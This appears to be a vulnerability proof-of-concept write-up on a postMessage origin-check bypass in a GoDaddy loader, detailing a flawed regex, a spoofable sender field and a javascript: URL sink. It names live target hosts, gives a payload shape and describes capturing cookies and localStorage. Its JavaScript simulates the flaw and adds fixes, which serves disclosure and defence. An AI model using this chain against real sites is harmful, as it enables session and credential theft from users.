Attack Chain
Source → Sink Flow
Source:
window.addEventListener("message", handleIframeMessage). The airo-sentinel loader registers a postMessage listener on every page it loads. The handler reads t.origin and t.data from the event. t.origin is set by the browser to the sending page's origin, so the attacker controls it only by choosing where to host the sending page; t.data is the message payload and is fully attacker-controlled.
Gate 1 (bypassed):
j(t.origin): broken regex allowlist
Checks the origin against /^https:\/\/([\w-]+\.)*(test-)*(dev-)*godaddy\.com$/
Nothing in the pattern requires a "." between the optional prefixes and godaddy.com, and both the (test-)* and (dev-)* groups may repeat. The domain serving this page passes because (test-)* matches test- and (dev-)* matches dev-dev- (two repetitions), so the hostname ends in -dev-dev-godaddy.com: a registrable domain that is neither godaddy.com nor one of its subdomains, yet it satisfies the check.
Gate 2 (bypassed):
if (sender !== "airo-hq") return. Checks t.data.sender. Bypassed by including sender: "airo-hq" in the message payload; this is a string in data we control, not a secret or cryptographic token.
Router:
switch(action), case "navigate". The action field in our payload is set to "navigate", which routes execution to the H() function with t.data.value.data as its argument.
Sink:
H({path, absolute:true}) → window.open(new URL(path), "_self")
With absolute: true, the function calls new URL(path) with no base URL, so the path is parsed as a complete URL and javascript: URLs are accepted without any scheme check. window.open(jsURL, "_self") then navigates the current frame to that URL, which executes our code in the GoDaddy page's origin, with access to its cookies (those not marked HttpOnly), localStorage, and any session tokens stored there. One caveat: a Content-Security-Policy with a script-src that omits 'unsafe-inline' blocks javascript: navigation, so the sink is exploitable only on pages without such a policy.
Regex Breakdown
Why the regex fails: /^https:\/\/([\w-]+\.)*(test-)*(dev-)*godaddy\.com$/
  ^https://        fixed scheme
  ([\w-]+\.)*      zero or more dot-terminated labels, e.g. "www."
  (test-)*         zero or more "test-" prefixes, e.g. "test-"
  (dev-)*          zero or more "dev-" prefixes, e.g. "dev-dev-"
  godaddy\.com$    the literal "godaddy.com" at the end of the host; no "." is required before it, so the registrable domain need not be godaddy.com

Origin                              Result
https://hub.godaddy.com             Legitimate, passes correctly
https://www.godaddy.com             Legitimate, passes correctly
(the domain serving this page)      Passes (regex bypass)
https://test-dev-godaddy.com        Attacker variant, also passes
https://evil.com                    Blocked correctly
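The following is an added example, not code from this page or from airo-sentinel: it reconstructs the Gate 1 allowlist regex quoted above so it can be run against sample origins, puts a hardened origin check beside it, adds the scheme check the "navigate" sink lacks, and dry-runs the gate/router logic described in the attack chain against a constructed payload. The function names, the hardened check's design, the attacker origin www.test-dev-dev-godaddy.com and the hub.godaddy.com base URL are assumptions made for illustration.

```javascript
// Added example (not airo-sentinel code). The regex is the one quoted on the
// page; everything else (function names, sample origins, payload) is assumed.

// Gate 1 exactly as quoted: nothing requires a "." before godaddy.com and the
// (test-)* / (dev-)* groups may repeat, so "*-dev-dev-godaddy.com" passes.
const BROKEN_ORIGIN_RE = /^https:\/\/([\w-]+\.)*(test-)*(dev-)*godaddy\.com$/;

function brokenOriginCheck(origin) {
  return BROKEN_ORIGIN_RE.test(origin);
}

// Hardened check (assumed design): parse the origin and compare the
// registrable domain. Requires https on the default port and a hostname that
// is godaddy.com itself or a label-separated subdomain of it.
// "test-dev-godaddy.com" fails because it ends in "-godaddy.com", not
// ".godaddy.com".
function strictOriginCheck(origin) {
  let u;
  try {
    u = new URL(origin);
  } catch {
    return false;
  }
  // Reject anything that is not a bare origin (path, userinfo, explicit port).
  if (u.origin !== origin || u.protocol !== "https:") return false;
  const host = u.hostname;
  return host === "godaddy.com" || host.endsWith(".godaddy.com");
}

// Scheme check for the navigate sink. The page's H() does
// window.open(new URL(path), "_self"); this resolves the path the same way
// but returns a target only when the result is an http(s) URL, so a
// javascript: path yields null instead of script execution.
function safeNavigationTarget(path, absolute, base) {
  let target;
  try {
    target = absolute ? new URL(path) : new URL(path, base);
  } catch {
    return null;
  }
  if (target.protocol !== "https:" && target.protocol !== "http:") return null;
  return target.href;
}

// Dry-run of the listener's gates and router as described on the page. It
// returns what the handler would do for a MessageEvent-like object without
// navigating anywhere. originCheck is pluggable so the broken and hardened
// checks can be compared on the same event.
function simulateHandler(event, originCheck, base = "https://hub.godaddy.com/") {
  if (!originCheck(event.origin)) return { outcome: "dropped", reason: "origin" };
  const data = event.data || {};
  if (data.sender !== "airo-hq") return { outcome: "dropped", reason: "sender" };
  if (data.action !== "navigate") return { outcome: "dropped", reason: "action" };
  const arg = (data.value && data.value.data) || {};
  // Unfiltered sink as on the page: any parseable URL is accepted as-is.
  let unsafe = null;
  try {
    unsafe = (arg.absolute ? new URL(arg.path) : new URL(arg.path, base)).href;
  } catch {
    unsafe = null;
  }
  return {
    outcome: "navigate",
    unsafeTarget: unsafe, // what H() would hand to window.open
    safeTarget: safeNavigationTarget(arg.path, arg.absolute, base), // with scheme check
  };
}

// Constructed payload in the shape the attack chain describes (sender string,
// "navigate" action, absolute javascript: path). The origin is a made-up
// hostname that the broken regex accepts.
const ATTACK_EVENT = {
  origin: "https://www.test-dev-dev-godaddy.com",
  data: {
    sender: "airo-hq",
    action: "navigate",
    value: { data: { path: "javascript:alert(document.domain)", absolute: true } },
  },
};

// Usage: compare the two origin checks on the same event.
console.log(simulateHandler(ATTACK_EVENT, brokenOriginCheck)); // navigate, unsafeTarget "javascript:..."
console.log(simulateHandler(ATTACK_EVENT, strictOriginCheck)); // dropped, reason "origin"
```

The strict check compares u.origin with the input so that only a bare origin string is accepted, and it matches on hostname labels rather than on a regex over the whole string; that is what makes the hyphenated look-alike domains fail. The scheme check is the second, independent fix: even if an allowlist is loosened again later, a navigate handler that only accepts http(s) targets cannot be turned into script execution through a javascript: URL.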
Target & Action
Target domains listed by the PoC (GoDaddy hosts on which the loader registers the listener):
  hub.godaddy.com            GoDaddy Pro Hub
  dashboard.godaddy.com      Main Dashboard
  dcc.godaddy.com            Domain Control Center
  productivity.godaddy.com   Email & Office
  sso.godaddy.com            Single Sign-On
  pro.godaddy.com            GoDaddy Pro
Live Log
When the payload executes, the log records confirmation and the data received back from the target: its domain, URL, cookies, and localStorage.